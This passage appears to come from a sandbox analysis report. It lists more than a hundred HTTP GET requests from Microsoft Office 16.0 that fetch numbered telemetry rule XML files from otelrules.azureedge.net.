                          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
